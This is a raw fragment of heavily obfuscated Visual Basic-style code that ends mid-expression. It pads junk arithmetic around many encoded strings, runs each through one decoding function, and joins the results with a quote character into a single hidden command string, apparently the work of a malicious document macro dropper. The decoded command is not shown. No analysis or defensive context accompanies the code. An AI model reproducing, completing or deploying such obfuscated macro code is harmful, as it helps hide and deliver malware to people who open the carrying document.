bhNUJ / 1089546 - Tan(ThruFS / CBool(QKAmqICE / 5775930 / SFtRjhwBwT))))NbiHqL = gjHBjhbyuf(uGMLD, 12, 78)FVlzE = "djbuSEbwaMjBQOAYDAlBgNAADA2AAMAQDAmBwNAIGAlBwMAMGA0AgYAMGAwAgNAYGA0RjRJFNSnspJKidvfHfViCb"fzfiKzsw = rHOlHDYfN = ZtPvIIa = (5008334 / czuWmpUwPLjba + 2655574 * jzbSqwtnw * (1362886 / dQOZUPMEz / 6170171 - Tan(kbvmHJUijzfrOJ / CBool(HjriLwPOMEi / 8149756 / TOWOskOzXDqkS))))mMPkLiSVq = UXYzYzPnH = NQUAVNjiZT = (5735214 / UcRzivh + 7086304 * AwsbspOfibD * (2253985 / JzXjtmnVRRpJ / 483329 - Tan(jZVTGXzMSbYcXU / CBool(qrawj / 3792182 / bvCuwKjh))))TiZukVvz = gjHBjhbyuf(FVlzE, 23, 57)OBGPOmGfQ = "ZGnQizwzoDtOIfIbhAmCGVfzPkMhBANAUGA1AgMAkDAxAwNAIDA0AwNAADA0AQNAMDA3AANAMDAhBAMAQGA2AAOAQDA1AgYAADA1AQOAUDAkBgYAUGA1AgZAkDAzGcr"QdcZqz = putvtEuIh = tzYLTE = (1123942 / NzpzLERIwRoDNa + 3077992 * HurFiAcJGW * (7425529 / UIJiuQzRAqjodk / 985387 - Tan(TivShtEYNA / CBool(MWfsoRSnq / 1593231 / IwdwiQ))))MDqLVl = LCbtvzqba = SbDkQtvl = (8901659 / wuWLwOUJW + 9918773 * iOnNLZbQXpQOw * (66295 / mXtPArE / 1877996 - Tan(RfPwhihF / CBool(ijMQXFUTUW / 
6096859 / jYLjbwPHzwd))))wpKOVjXV = gjHBjhbyuf(OBGPOmGfQ, 4, 97)FGrNokEuTNw = "QELEkPABbhWCEWizjPhZnHriiiBANAIGAlBgZAEDAkBANAMGAhBANAIGAwAgNAEDA3AAOAgDA0AQNAYDAyAwMAIGAxAgNAQGAkBgZAUGAlBAZAMGA2AAMAUGAmBQMAUGAmBgMAYGAmBQYbXpiB"kvPzjdJNYzi = CFWGThLhQ = piWNcapsUXT = (4113848 / oiZAZBiBNQKLiV + 6047323 * ZBKlanVOcKj * (3033238 / LnwhKhbu / 6296610 - Tan(fhicNMCzEJIv / CBool(IjUBIKXOS / 3681423 / CdNiToDqsOiD))))adIzMBIhc = sLICaMfGI = RnzqjTjJ = (4520340 / OzZkwYi + 3055175 * SCHdjc * (8057347 / HzCnN / 5365706 - Tan(MajdIkGjrQou / CBool(XEChPzqMJJRO / 8113990 / cLUaBVmY))))BzPak = gjHBjhbyuf(FGrNokEuTNw, 6, 116)jVmpGERfY = "LGwXfFgMAUDAzAQZAUGAkBAOAMGAiBgMAUGA4AQYAgDA4AQYAUDA3AANAEDAlBgNAgDAkBwYAkDA5AQYAUDAyAwNAcDAyAQOAEGAyAwYAQGA3AgMAIDA2AQZAIDAzAwYAUGA2AwMAYGAiBgYAMGA5AAOAYDAyAQYAADA3AQYAcDAwAAZAUDA3AgYAQDAkBwMAIGGlmMuYRpjiYj"lasUB = dYjtSZzwA = VXjMBhLnF = (5720703 / NnmEJbcoWkF + 4016938 * zwzuzJJi * (1356354 / TKzQDZKztKFPlz / 7949065 - Tan(wVJioQ / CBool(NNDhR / 7958074 / UwGsStKLYPLkMK))))OFjSttizL = NjNCFoLoY = GDIlCArtKz = (8102930 / Isfvwm + 9366160 * SDEszdpfLAkfZ * (5767406 / PlYIYYSaOUHa / 4086915 - Tan(JpYrfKCwQ / CBool(ZKMiJNKjiFQK / 5041532 / YVAcqXsDUI))))vFvvcfdFmQ = gjHBjhbyuf(jVmpGERfY, 13, 189)tRNazmsWqk = "PUkBQMAMGA1AQYAQDAmBQZAUGA3AQMAQGA2AgZAEGA3AwNAQZIiBGkjXvazr"cjcMvJJjXVO = OTiaOkBdC = ACCMsLshoAMs = (8373105 / dXLurTQNi + 2769675 * owUwmHaQMomjjO * (9945090 / STBhVbFwqZG / 7309306 - Tan(UmToREMYjBt / CBool(cilrrfjriwuh / 6242257 / MtXHNAojs))))LoROquIhj = BSsOKnMjR = vswUEz = (8769812 / uAWslIsrSA + 5234094 * szwmjZwRWEWP * (5471367 / kjQZSITau / 6092711 - Tan(JjkWTULHd / CBool(zwJkfAc / 687997 / iGPLXLatiSUSD))))MUFwAhiiSa = gjHBjhbyuf(tRNazmsWqk, 13, 46)kiSMIFS = "KAIvwzGLzzGAwAQOAADAxAQOAADAjBwYAMDAxAwMAADA4AQNAgDA2AAZAQDA3AgYAIDA1AQZAgDAmBwYAcDA3AQMAkDAlBQZAYGipjsAz"CHnLzHkTEYp = QdUciXWhi = AuQrjPkzow = (6936854 / ZmrWHbvpUZA + 6147250 * BDZBnmAoMOwo * (4170890 / klMhBzkDhkMQum / 7804727 - Tan(atkGiM / CBool(vBKjrNY / 8738733 / 
liKEIrwjAzV))))sIfSXw = ppXrNABnE = OSXaR = (6233223 / PtpJrifPckBjv + 695703 * jrVGiS * (4245786 / LlpiWMndrLHRG / 1556770 - Tan(zLrclPA / CBool(JAHmj / 876469 / CYtCdXB))))RfrsBkS = gjHBjhbyuf(kiSMIFS, 7, 89)ztfAB = "XPHOQDSVawRoubXZDAlBQOAMDAjBgYAIGAlBAMAIGAiBAOAYGAwAgZAIDAhBwMAUDAmBQMAcDAjBgMAUGAjBAMAcDAzAAMAYGA1AwNAADAhBQOAUGAwAgMAUDA0AQOAgDAzAANAEGA3AQMAUGAzAwNAkDAhBgZAADA3AQNAQDAhBAZAQDAxAAOAMGAkBAOAgDA4AQNAMDAzlsmLroMBlNjEALQ"iAHUR = MzZqpuPcL = RzMTMEjM = (2948498 / IvqMEmRbo + 2795570 * CwRirCsNX * (4558254 / LirQustnjjmuW / 3129771 - Tan(NlDdon / CBool(zPBvlUCnzrzSkI / 3925004 / rYiAfoQEvRko))))LCdPzmCvi = HJujCOkcP = HYlvjuwEfzszME = (1212778 / QIzwATkNjqzO + 2950304 * XrZrRJPkH * (4171550 / rmlvKz / 7985651 - Tan(PzbdSznoXO / CBool(wioJbBXUnwXjB / 5670734 / JhzSWsIlzXvO))))SwiARdQw = gjHBjhbyuf(ztfAB, 16, 187)wiwTiIKb = "rQLAjworKOaEuLJDBlfRJupmBQNAMDAzAgYAEDAhBQMAgDA5AAOAYGAyAAOAIDA1AANAEDA5AwNAIDA3AwMAIGAyAwYAUDA1AAOAMDA1AgYAEGA1AgMAMGAhBAF"wJdDAWpji = sifKYmaku = hSVptPMPNPMAt = (86951 / TSSXiETkAii + 2103482 * jjZIKVYW * (5021972 / plmSvSWsp / 5916415 - Tan(EUINMnNiUG / CBool(EtfdqDp / 4543289 / JtucmvmXRd))))HiBmPsNsFSR = qojnfPRvw = KnFQajsmScS = (464507 / CVLZfaQA + 8091169 * rPaYFAOY * (1678008 / pRVniCGCzFpKo / 4447404 - Tan(STplUhhUXO / CBool(zImmD / 708667 / KclAXv))))vLVBC = gjHBjhbyuf(wiwTiIKb, 2, 99)jAwHiJ = "tTGmUAUDA0AwYAgDAjBQZAUDA0AwYAQDAyAgYAYLDvzWzjoLJijDzAaJ"DzWuUDp = HBcoKdVzm = KsbAGPUmjhJ = (3830248 / UizFm + 433846 * JTkKtpbRZolYiu * (3666633 / bPqNNqqKsnz / 1449643 - Tan(LXizrZ / CBool(IRHQnDNrvllHB / 91629 / qvpiTdaRF))))AFcbalcb = qTLNQDaqV = ZKIZZKcwOH = (368022 / GFnjmIJGMiABa + 3930320 * zasKvlYaNiVPX * (8142667 / LJEzNGakQR / 6447275 - Tan(QrKHzETc / CBool(WwGFhiawQ / 8632495 / PhWqwaGlZqbs))))mjlsnFbCmkS = gjHBjhbyuf(jAwHiJ, 18, 34)SibCQkmLV = "CbmTiPBYSXLNMhSAUGAyAQOAkDAjBAOAEDAjBQMAADA2AwNAEGAzAAOAYDAjBAOAUGA4AAOAYDAhBANAEDAiBgNAYDA3AAOAgDAjBQMAIGA0AQZtWGWvmOIkRQvzHFsN"ZnFBzzmbGw = VLrwmSwXU = zrWcDYPbrG = (1188805 / 
zhzdacwGznHIW + 495471 * KBYOTC * (9190483 / jvGXolFwAq / 5979815 - Tan(KzJsTaO / CBool(KkOGBSEaTr / 7390945 / BCPhTEIVuqGR))))tzarus = qovLrfuto = UzjzWVjf = (5620775 / ErMHjb + 4888447 * SsiTdzP * (2448998 / tioztwiiQ / 242795 - Tan(hmoPNwMw / CBool(ocQFfbvkBW / 6790189 / KwnwpLLtdZT))))IoFUk = gjHBjhbyuf(SibCQkmLV, 18, 96)QECmVWbIf = "wOkEOP4AQMAYDAmBAOAYGAwAAMAADA4AQOAMDA0AwYBsVatZuqWMWDOiDfldJpwTPKA"DbHnhczQVwY = OSWjidmFp = OzPHmwPD = (4795397 / XjzHXoFLS + 4475525 * PzazUzX * (8592956 / iQVRW / 595588 - Tan(JMcPj / CBool(WlhVPMtYanSDz / 259896 / JSzsLUpGLflT))))kGohXHRJL = lwzqHdWbo = whKzjHd = (590013 / XBNzucX + 4736637 * jfWqisHbb * (9448340 / acZAuTR / 6522318 - Tan(oicIROS / CBool(wENkEwvJs / 1514573 / RrEjj))))NTiqD = gjHBjhbyuf(QECmVWbIf, 26, 36)AVnCDHMVO = "EzMZWQjGAScvn4AAOAUDA4AQOAQGAzAQYAMDAjBgYAMDAjBgYAMDAzAgYAMDAiBQOAUDAiBAOAUGAzAgYAMDAkBgMAcDA4AQZAgDA1AgNAkDAmBAMAQDA5AwMAYGA5AgMAIGA2AQNAcDAxAwNAYDAxAgYAUDAmBgNAUDAzAgYAQGAyAgZAUGA1AQMAEDA1AANAcDAMYNqwECzAa"siIVL = JsAzLDsnn = CVAOABio = (8435210 / imRNmn + 202882 * njlZwiqD * (1118093 / jsslz / 5448761 - Tan(JdAjhsohUfX / CBool(mKXCbAHddW / 4161762 / zvcFzMwmp))))WolGuhTM = hcKAkGnzs = zScTrLqRlr = (9688975 / mIcjl + 3067482 * iHiklFhNBqt * (3891545 / lsWFUcluIvL / 9003908 - Tan(iqBYBVXNJXQiq / CBool(JzoarXR / 3324030 / lWOIipZLWpuar))))ENCqSR = gjHBjhbyuf(AVnCDHMVO, 11, 184)GTENXCcc = "RUzwii1AgZAMDA1AwYAQGAlBANAUDAhBgNAQDAiBQZAUGAxAQZAgDAyAwYAMGAkBQYAUDAxAAOAUDAjBgYAcDA2AgNAEDAhBwNIbfqqTuiqiTZkUpjzSRYwXsZmnii"DqzuzpTwhT = bVoijIXDw = UTCTqjv = (1511246 / WupZM + 4908817 * sMPLqTFIzpXaAs * (4785539 / ZIPiAzAzj / 2309175 - Tan(CflvcJjQKnmXB / CBool(tTAIUHI / 9568146 / PQwqwsLPc))))qiTjsoNU = icDcNtuRQ = NjmkNUHjzq = (2852053 / iFIWf + 6060660 * lXzYKtZL * (3241616 / GNDrjj / 7522290 - Tan(jjWrLMYNat / CBool(UrOPzfEOLbqoJq / 5097775 / dLNCVVszwvtMn))))bFRhQlCinR = gjHBjhbyuf(GTENXCcc, 29, 92)tiSaMPR = "JvtAaZiHkZAYGAzAQMAEGA5AANAIDAyAwYAYDA3AwMAcDAiz"fcHDsLlNh = RUsRIHiQV = zzYzGbr = (1427673 / 
TsQRlBBnAv + 4502245 * rGWOjh * (3380725 / IoBPFKbuQojZ / 4019512 - Tan(pNADHQGTiU / CBool(DFqBlZtZWVirAM / 5173496 / HXLLwnPRI))))cTajGWECQz = NdZBioGjS = EksiO = (8041873 / wGKWzqjqzwWJzQ + 8216578 * sXwUYshYK * (6708161 / WpOszWw / 7842916 - Tan(GmOmsL / CBool(rjXSkNKzGR / 4114778 / GYmLQfKAkE))))hcFiOBTTdt = gjHBjhbyuf(tiSaMPR, 2, 38)hwluzEpOjd = "EkoYKjnrXuloRGXiwIsiubTPEGAjBwMAUDA1AgR"OOqtlArrA = wpPisNmEA = ZdUUBlY = (6897375 / jVfSDuccNzMOtl + 2397467 * JCuuIB * (3671566 / zQYCiw / 3364108 - Tan(DZmvTW / CBool(oPkZFnw / 6176904 / HOsjiprfCYTnV))))TQcVwiOuIXj = auQhELTzQ = mqFiXbNTDkju = (3895488 / iiOiH + 8694051 * DZSpqIYjlMsqbF * (8624497 / LTDpFPCof / 4988986 - Tan(zZwlsXr / CBool(RnohSpjSXoE / 8534857 / pFDPEEpnWdKQzY))))EOGbI = gjHBjhbyuf(hwluzEpOjd, 2, 13)fcCMwP = "tTfUXTVvCAIDzQAnnzzVhVtOQXEDAyAQYAQGA0AwYAUDA5AQNAYGAjBQZAMGAhBAZAADAhBQMAUGAzAgNAEGA3AQYAcDA3AgNAUDAyAwYAYDAzAAMAjjfMqYcY"asGTnFtbSn = jisblaAjt = HEVYVJRtJASq = (6489256 / rkAWdvz + 7607478 * jMlokEwjPG * (4705547 / PtJjuOBYjktB / 6618705 - Tan(AadDzrTaoLk / CBool(joKQCkJY / 5386390 / qnjhvPuwSkGBE))))nuiUCtNANX = YGMIhSpEz = ZiMNThIrKHJkqT = (2988242 / EfstAOikmKqbcF + 7386492 * soJziBbOKswt * (8932222 / QstlOJMEwLDc / 5286680 - Tan(rhPEVX / CBool(BJPMCEdjIRlqz / 8888893 / iqrcZnpwwGaSXc))))DqtizzSQ = gjHBjhbyuf(fcCMwP, 9, 88)MwpRau = "DliSPRblAMAIDA3AAZAEDA4AQZAQGAlBANAEDA0AwMAIDinpJCoGznGOiDZR"zkMFiO = UImMFomjh = cdzfvIcruz = (9264524 / MCpmY + 131345 * VzjvvLPG * (8208207 / VfDlAnjV / 4986888 - Tan(VGozImPwk / CBool(SPmNMfsiC / 3810981 / ClZZUsTLPIR))))dnEqwnkiR = wczPIkmJw = VTwFtqZU = (8975499 / TGsTUPaotvlVOB + 3278623 * PzWIvt * (4480503 / jSaTaCu / 8267082 - Tan(KwskiutK / CBool(PAhAFzojaczmDa / 6695411 / nCoGNqAuAE))))tCsBVhJ = gjHBjhbyuf(MwpRau, 17, 36)cVdXsUz = "RBwSlwoYvSEGAmBQNAIDA2AQNAIDAiBQMAYGAyAQZAADAzAwMAYGA2AgNAEGAxAQYAgDAmBgMAADA5AgNAIDA4AwYAMGA3AAMAQDA3AQOAUDA0AAZAMDAmBQOAkDAlBQOAADAlBwNAgDAxAAZAkDAxAAMAkDAHjktqTDrjZhmTIBMfjzuW"Qrbfv = GcdcLqbpd = zDQOJIiRv = 
(8427911 / GzIUN + 8068639 * ibAEhHzHYRSY * (6938037 / JIGLlboGSc / 96531 - Tan(kzfVI / CBool(AmKBXsWIPBjNzW / 1489881 / zoBJcOBXIY))))TMlTIHdvQw = DjXzbCIUY = RHlNocMmWFcdtH = (468230 / TzUmlmtzpplQZ + 6296362 * iwKKq * (684806 / UACPADvZmPwl / 6747771 - Tan(zmMfNl / CBool(zrvMqAwfj / 9480041 / nffUjWl))))zSzuzDU = gjHBjhbyuf(cVdXsUz, 22, 147)wVMcMwrlh = "zrdWFRfSDAyAgYAMGArpbfZiaXwcarj"NIKTjSHt = YWRkbowRt = woUJdfdlJlX = (9950702 / JpcsiDhNHwik + 7169831 * UIScWkwU * (1746446 / SnVXrd / 6657659 - Tan(ZiIuzvNOMTqspY / CBool(KJcqJAPpojSav / 6539429 / VdNhLC))))attZkiRsN = MaIWOIXfd = TuvKOPmZ = (9266203 / tTOjVS + 6179544 * zNiHM * (8091385 / iUUvsrJLPwjzXv / 1241351 - Tan(olCIsMbBvcVhP / CBool(MhFMfuSiDRkI / 9717893 / pSJHrWpVKhG))))sEWFsm = gjHBjhbyuf(wVMcMwrlh, 14, 10)BmouLJ = "uLEQKdIjNkLHAAMAcDAiBgMAIDAyAAZAMGAjBQMAkDA2AAOAQGA5AgYAYGA2AgMAMGA3AgZAUGAwAQMAcDAmBAOAADA1AwNAEDAzAACo"aVYDqVdYVp = qmVJozPAt = WaztkszQAkQb = (7502718 / HPtcITFEiX + 606912 * uODwF * (922609 / knURIOVmjD / 1812791 - Tan(PztCZGnrafSwc / CBool(jzjMBiLAConzk / 2780777 / hWAUfnEAMirS))))wvkFWVX = NAEVXpShY = WBifO = (9308355 / ObWYEs + 1823346 * bzCcwXiJ * (2345296 / zwTPHRhOizwpzZ / 1465432 - Tan(zCVtIIuDwsPEbf / CBool(rShOwlzUErpO / 1916631 / lwcVBZjo))))mwDBYaGKijX = gjHBjhbyuf(BmouLJ, 4, 89)ZaziqiqT = "FRBQYAYGA1AANAEDA3AQOAYGA1AAZAUGAiBANAkDA1AQYAQDAiBQmCpPnGaLbzffD"FfwJVjOOj = XimWoXvHq = cwDJTH = (5876685 / UjELIu + 4026954 * OsWoHQmwuv * (5563475 / bFqSGHsb / 6030345 - Tan(qZENDwnMa / CBool(BKJClCwMJHPYi / 2815883 / PplFABtztC))))lZwsP = wjtMqIhUk = RwojDJf = (3353795 / FRvpioHBH + 5014049 * HKPApSEATwhEt * (44724 / SAEBrWc / 5227828 - Tan(kAuLYjGautGH / CBool(orlEfzZYNBp / 4178659 / GwFiUfjcP))))jBITvPRb = gjHBjhbyuf(ZaziqiqT, 15, 49)dMwQmWRF = "OpZRzTIwXBEXbtqu2AQYAIGAiBAOAYGAmBgMAQGA3AwMAADA2AQMAUGAyAQNAQGA5AgMAMDA1AwYAIGA4AgMAEDAxGFirRXKbPJPW"vkFjajuJ = MtHdGwfFb = iCHYlUplNP = (4485263 / LiIYIFiiusqFw + 1894488 * KKVSOVfr * (2885473 / BuvGncbKTi / 5682261 - Tan(hqZWwiqMC / 
CBool(bAiarwIXfm / 8697879 / GLnXGPOuibqpcf))))ZvXDRw = trZzBCZaS = bNkfBvDqbjjNj = (4752189 / awHwAKpzMD + 3221286 * hlqYfttvtfjsiY * (9918476 / tvfIAUa / 869640 - Tan(iRkmPXbl / CBool(VFlLDTqcjvPONc / 2042763 / ERXIwMKmFB))))OiTHLRtF = gjHBjhbyuf(dMwQmWRF, 13, 73)BCUJAm = "NrCfQRDAiBQZAMGAxAwMAYGAiBAOAMGAhBAMAMDAxAANAQGAkBgYAEDA4AgNAkDA4AgYAUGAmBwNAIDA1AgYAIDA2AAMAIGAiBQYAIGAyAQYAIDAlBQMAIDAiBwNAYDAxAAZAQGAmBQMAADwFfOwZp"EwdLQXuJ = iPCDSEwVm = FcqhQVwkrFWu = (7675889 / GvXZljT + 2029893 * NLkbXWPmitDcU * (9677918 / sqqwAhCnbnz / 4495391 - Tan(YjFUukdVjuY / CBool(cTnBkmm / 9405166 / hvqXKKKXInazi))))wKRQStS = NzojhjVML = RhXNOmrALaqroO = (9393247 / ZSwXGwPuGoMA + 908525 * bdVwZ * (7937956 / zwlRnPYrWLZm / 9507632 - Tan(COnqSSd / CBool(aZqvIw / 2503787 / qpHwbWMGS))))dKjAzVGtGi = gjHBjhbyuf(BCUJAm, 8, 137)GjCnl = "UswpBHATNAMGA4AgZAMGA0AAMAMGAyAQMAIGAxAwNAUGA5AQNAUDA3AwNAEGA3AgYAYDAzAAMAQDA3AgNAgDA4AgYAEGAiBQOAIGA1AgMAMDA0AQZAUDAwAQMAkDAyAAZAYDA2AwNAIGAmBgNAUDNtEDdJFBaH"NBjShSfji = IzfCBzGLC = qktjHjjoAMqJ = (3648736 / ajYnQqWVAp + 9896722 * NLwlPji * (5789798 / pFWhTwYlpDz / 5797376 - Tan(cVYTu / CBool(RUjDjvT / 4451568 / OwHiowkaBGwsw))))jiaSXWjj = jLlzhLjdM = oSMMGBplAbiXtw = (4034254 / EruXNwTTkXSh + 2651723 * nMBzSM * (5473742 / iZMUvRPMSpi / 8589795 - Tan(sjpjqz / CBool(bijIXtnWWtdIM / 3976488 / VLsCBDY))))ELUPRwpH = gjHBjhbyuf(GjCnl, 13, 138)MQwQtbMf = "VkkzZDBzfBgYAYGA3AAZAUGAzAgYAEGA1AAMAEGAlBAZAYDA2AQZAYGAxAwYAIDA1AQQjwI"bNilwoiVDm = dddEMhjIz = KCrmJBlHGmnAjJ = (5687680 / oNhWv + 4513761 * dHXCqzsSRQm * (2412464 / vnWULjTardwTb / 1960099 - Tan(VabAmVOflzuJN / CBool(WjtzkGAr / 2540224 / PDFldaj))))kziFYij = PnzwrpmZX = IkVRWFGVtCW = (8243086 / tiNRl + 6723501 * dBLQfWOX * (5880200 / HXMZrGrtswzPj / 4588403 - Tan(YkGRiXB / CBool(HDGZFmArirzvw / 5796772 / BYVYskQNSn))))tHCnwzQRo = gjHBjhbyuf(MQwQtbMf, 5, 58)jCKFAUiVMR = "BIjQAwMAkDAzAAMAADAxAQOAYDA3AwNAcDAmBgMAMGA3AgZAMGAlBgMAkDA2AQOAkDAxAwNAMbujwRavfozurzPwhMJwcAfSX"vAILpTSwmr = bOThjPAGs = LdSwApUIKHaX = 
(8229662 / jOMRnmAVdqSVI + 9349375 * ZhAvIJTWCZtp * (3625829 / ujEXbwSCiTF / 7934744 - Tan(AbjijYSkZZbih / CBool(sJstzhni / 2077004 / wjzWWwh))))wpwjvLivEBc = pSTSuWuNQ = wUGcouiatqZHHC = (3457626 / SjzawOas + 7318956 * Ozznzjhh * (8182478 / EkJmPvd / 1672321 - Tan(iLQAdD / CBool(NqDitOq / 4739638 / lcFstaaMEMh))))CtiGajmkTh = gjHBjhbyuf(jCKFAUiVMR, 25, 69)AlDOvWUmiR = "azCBwjIEEOHOWojYKoWzqoMZPuzAxAQNAADA2AwMAEDAmBwYAIDAlBAMAEDAhBQNAYGAiBgZAUDAwAwNAQDAzAAOAYGA1AQYAUDAiBgYAEDAxAgMAYDA3AAMAQGAxAwMAQDA2AQYAgDAmBAZAgDAiBgMAUDAhBQYAIDAmBQOAYDAhBANAYGA1AwMAIDA3AwYAYDA0AQNAMDAwAAZAITjIM"VZwvK = uhDtzVkaI = zooEGNIYVtsKj = (4119790 / sWKtiXftnKj + 8217428 * NEaSDQRjA * (1313004 / vizSGUjBiKEzaj / 5032257 - Tan(TuAuZWjK / CBool(TaGQDzsP / 2616757 / DYNnTafIOJFzld))))SnDmXhOB = zzozMWYvp = mudki = (2157494 / jMiXuGH + 6438469 * tOVBLToc * (3711969 / KtCqZH / 6802329 - Tan(AZwviDz / CBool(mCGCqhRsc / 1925914 / nqSFBRXASj))))sroVjvuU = gjHBjhbyuf(AlDOvWUmiR, 5, 183)RMswC = "IbOjoCdPQppNYqAQYAMGAkBQNAYGAwAgZAEGA2AQOAMGAmBQZAADAhBQOAEDAhBgMAkVMfXVrhLwQDnCKCDjzDKRFjNj"uiownVww = PdzfmRIAK = TBUtIwsJAU = (5006048 / bnUZi + 4583299 * HDIco * (2397193 / fkniHsTzABzvb / 8715019 - Tan(CSbaOBJKMjk / CBool(CYLYjjRQIWRNhh / 5816307 / TcnwJaBpBNwq))))wpPfLTHF = VZazWuQZp = ROKcYjAOsj = (4495916 / rkwoncWVX + 3573701 * avivSqmQFzq * (2158455 / mhBVomURS / 9781155 - Tan(pCiHoCTFwfj / CBool(qkiYFPSZBZX / 345958 / aBhkzR))))thcTX = gjHBjhbyuf(RMswC, 26, 53)wqhQViSJ = "sHUBkBkXbAjBgMAIGA2AANAYDAzAgGJnIEJJb"KzHWs = zUOYqhquX = FzABXsv = (2455034 / ZtAVtBllslSU + 5835767 * tiHAwOGG * (8848455 / ZYRDwKBCVaYYw / 9782912 - Tan(WFwzJFsah / CBool(WQswwf / 3500533 / JwVjhnhjPwEtVj))))DtRjUX = IiZJKIkmh = kwbuJDXuGYoCAm = (4503778 / QaptWn + 7065044 * INYoUJPXPXzlL * (7502320 / MaJnzsFin / 7303136 - Tan(sJzna / CBool(LlmwfiazIRncnm / 9564672 / BdSNAmzCil))))rsBQPlVCXMj = gjHBjhbyuf(wqhQViSJ, 9, 20)RVbMJiE = 
"jXMlGYOthwiWONvfwVzBROGAwAgYAQGA4AwNAQGAxAAZAEGAxAgMAEDAlBQOAYDA4AwYAcDA0AwYAIDA5AwYAADAmBwYAUDA5AgMAgDA2AQYAUDAZTH"hwjKrYhCD = vcMmMKKOD = LniIV = (3028706 / OMiLBWZUQfd + 6657498 * dfzzanbsaZN * (6128948 / iPdVZnNJQuD / 8936443 - Tan(FmSvfjjUYfqii / CBool(oqomUfVoJqv / 1046191 / VZNltFjioaiuj))))lpiziV = zKJjnqrGY = bHjOYRcb = (9966495 / qKuLuwZBw + 31021 * KrnfLiZD * (950466 / jwGldKq / 1392051 - Tan(LwiUqoPw / CBool(qRpIYCRQviNmC / 4646702 / MHOoaQliujoRfW))))BkIuzmR = gjHBjhbyuf(RVbMJiE, 4, 89)PZTMtTiEjOw = "FCzzvYAgMAADA2AgMAADAxAgNAUDAlBAOAEDA4AQMAQGAwAwMAADAiBQZAkDAzAAOAIDA1AwNAkDA0AwYAMDAzAQMAEGAiBQNAgDA3AgZAIGAhBwMAYGA1AgNAIGA5AQOAUDAxAAZAQDAiBQZIpUJ"ZpCTv = ijazzHEDL = DSWjFKacobT = (8920427 / hbppYvi + 5116563 * XtohpbbjKYI * (4203311 / ZwmiwTwPSWk / 4440421 - Tan(XHRjIdFUucuXV / CBool(BFRumqCCtDtzOi / 3628146 / XEKwE))))YGmwPTFjKr = TSiQiQKiT = GcUvKBbwjqVNN = (7380399 / ObCqFqM + 4762174 * hnmiHasXaMnUui * (1655786 / wGiGj / 1123066 - Tan(sEQoI / CBool(NBtEZNWPwqGw / 9537759 / BzrUstnJjiSL))))KrXYahuCMw = gjHBjhbyuf(PZTMtTiEjOw, 5, 139)EUAmz = "GuzVuhrkpLwmGAmBgZAUGA3AAOAEDA0AgYAIGAkBAOAIDA1AgZAcDAzAQYAIGA1AgYAQEsZVQlNFPBQnHzPYJnf"qzvjsEZau = dPEtWsMmm = XHBuwAancISKDc = (8760490 / QwXzuoJjfEG + 3356051 * QSOaB * (3746836 / jOwiDSH / 7998493 - Tan(TMbzp / CBool(PPpAjzUPst / 1796042 / MpDjCJfBCAp))))UtmYpo = tcjUjMsfR = nDzkAjQ = (2155959 / EouiuAwjKSUnZP + 4873635 * YCcoCzOrVYmDwB * (4863226 / qDvBztm / 3854513 - Tan(ciNzaOnapch / CBool(WwEaCNWOtkIs / 1041978 / VTYwfQIFZRAuuJ))))jDbNM = gjHBjhbyuf(EUAmz, 20, 56)puriTCO = "tZpDEtoBFBAZKrTjCLQmwMznvOjFMkDAlO"hkJoJsqi = zRcBovsGC = koKGajbcYwLmvM = (7938121 / ANoRlnVX + 5886290 * SBwIIh * (2019645 / FlHksd / 4628793 - Tan(SIhLW / CBool(MYufRkJz / 3673094 / bSQajPndbmGE))))XmNzuuAOriB = JQUKtjVMp = mCoXOcQZ = (9929404 / SUIaMz + 4213066 * VEjkJ * (1573005 / dLGrabG / 9447715 - Tan(fOlIBK / CBool(BmzloHt / 9610934 / NSrkjCsjIkRJiZ))))nYBGc = gjHBjhbyuf(puriTCO, 2, 3)CcDCtEVr = 
"EwOdcTFYXBQMAMGAiBAZAPwF"FZRJPcZ = wJPSJMMrh = XYpuTDsC = (6121649 / scGfhXanhQEnUl + 2754288 * ziraAhQsD * (8545425 / OthYlikCTDkk / 7296330 - Tan(YJROkEEfvFKK / CBool(zLMNb / 7941800 / MtArTEjiuTN))))dIBnvGwZJj = zFpcXwdTn = iwbObdlrHpI = (9063322 / YfIZv + 6074509 * VkbrMFPW * (7643186 / kIBBivY / 5675702 - Tan(awrndFCEQwOZi / CBool(TNzWkBVNODtF / 9945293 / AujkwDEWizwlJ))))iCbIT = gjHBjhbyuf(CcDCtEVr, 4, 12)uswKJtj = "vZUMElAJjrOQQYAMGA0AAvfSbvt"ZTZPrMUZ = kjtqhOFFD = TILCXt = (5038482 / kDWtdMT + 4782960 * ljWliubYSwTKis * (2577506 / SSTYrKAAtuFk / 8254052 - Tan(hXITT / CBool(jUpOkdFvG / 393707 / KJFKt))))PuUoPlvjIZB = AADbjWrjp = hPQwCPYoGwdFn = (2662687 / Eursu + 5143772 * snXHPsrKcFYs * (9173304 / iKznmUwMPvMpW / 5426258 - Tan(zruQwXcYuz / CBool(zwVYjvSOZjr / 970426 / GmfYcv))))MjvmhNHtCDo = gjHBjhbyuf(uswKJtj, 7, 9)SHzYRwH = VziGLuPjjz + WPicOibzSB + dQIcNsh + ChrW(34) + FnFXCqrORXHC + jIBTlSFkaIz + KJZTfP + EOGbI + tCsBVhJ + wfulZS + jwhPS + ELUPRwpH + MjvmhNHtCDo + kJQbk + fHkdZ + KrXYahuCMw + dzlRupHv + jKofwjNlE + TiwGaYD + NbiHqL + nnwzJzqUUu + UulGq + IoFUk + NTiqD + InXrLQbYI + iRGUUsNY + jBITvPRb + nuujzXVPTqz + MsJPddN + zSzuzDU + UHHIQHPzS + BzPak + qccNtmb + iwqmwDfj + ntJcDiWtZXO + bFRhQlCinR + ENCqSR + JDFSWTdkrtS + DqtizzSQ + iCbIT + hcFiOBTTdt + rsBQPlVCXMj + RfrsBkS + CtiGajmkTh + wpKOVjXV + sEWFsm + jDbNM + mjlsnFbCmkS + dnviYZlaFD + vqzkvC + tHCnwzQRo + WvCDvIYJ + OiTHLRtF + dpJGfAk + vLVBC + ddWLaoYwjX + nYBGc + sroVjvuU + dKjAzVGtGi + thcTX + TiZukVvz + BkIuzmR + vFvvcfdFmQ + mwDBYaGKijX + SwiARdQw + MUFwAhiiSa + UZpOKtovWMh + uOHTIsHmlKJrEv = zZKhNsKBT = wXzmRCjk = (8006843 / NdCOMqVbsRp + 5250998 * qGOvppzhMwELiu * (4088624 / ibZBYhVXv / 3990275 - Tan(XiJBdUaHf / CBool(Htusz / 200716 / zChwzGKqQZY))))IlrAUSZwD = wbqEnpRbh = JZjpZtmaXb = (9771522 / NvCzuMG + 4812385 * SAzjWLdIKo * (6707485 / lPzbvR / 1349416 - Tan(rCWEkOvCnuF / CBool(ICrYjGDh / 1754793 / 